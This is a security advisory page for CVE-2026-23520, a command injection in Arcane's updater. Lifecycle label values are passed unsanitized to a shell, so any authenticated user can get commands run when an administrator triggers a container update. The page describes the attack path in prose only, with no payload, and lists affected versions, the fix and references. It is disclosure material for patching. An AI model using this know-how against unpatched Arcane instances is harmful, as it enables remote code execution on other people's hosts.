Arcane has a Command Injection in Arcane Updater Lifecycle Labels Enables RCE
Description
Arcane provides modern docker management. Prior to 1.13.0, Arcane has a command injection in the updater service. Arcane’s updater service supported lifecycle labels com.getarcaneapp.arcane.lifecycle.pre-update and com.getarcaneapp.arcane.lifecycle.post-update that allowed defining a command to run before or after a container update. The label value is passed directly to /bin/sh -c without sanitization or validation. Because any authenticated user (not limited to administrators) can create projects through the API, an attacker can create a project that specifies one of these lifecycle labels with a malicious command. When an administrator later triggers a container update (either manually or via scheduled update checks), Arcane reads the lifecycle label and executes its value as a shell command inside the container. This vulnerability is fixed in 1.13.0.
AI Insight
LLM-synthesized narrative grounded in this CVE's description and references.
Affected packages
Versions sourced from the GitHub Security Advisory.
| Package | Affected versions | Patched versions |
|---|---|---|
github.com/getarcaneapp/arcane/backendGo | < 0.0.0-20260114065515-5a9c2f92e11f | 0.0.0-20260114065515-5a9c2f92e11f |
Affected products
3- Range: v0.1.0, v0.1.1, v0.10.0, …
- ghsa-coords2 versionspkg:golang/github.com/getarcaneapp/arcane/backendpkg:rpm/opensuse/govulncheck-vulndb&distro=openSUSE%20Leap%2015.6
< 0.0.0-20260114065515-5a9c2f92e11f+ 1 more
- (no CPE)range: < 0.0.0-20260114065515-5a9c2f92e11f
- (no CPE)range: < 0.0.20260123T022811-150000.1.140.1
Patches
Vulnerability mechanics
References
6- github.com/advisories/GHSA-gjqq-6r35-w3r8ghsaADVISORY
- nvd.nist.gov/vuln/detail/CVE-2026-23520ghsaADVISORY
- github.com/getarcaneapp/arcane/commit/5a9c2f92e11f86f8997da8c672844468f930b7e4ghsax_refsource_MISCWEB
- github.com/getarcaneapp/arcane/pull/1468ghsax_refsource_MISCWEB
- github.com/getarcaneapp/arcane/releases/tag/v1.13.0ghsax_refsource_MISCWEB
- github.com/getarcaneapp/arcane/security/advisories/GHSA-gjqq-6r35-w3r8ghsax_refsource_CONFIRMWEB
News mentions
0No linked articles in our index yet.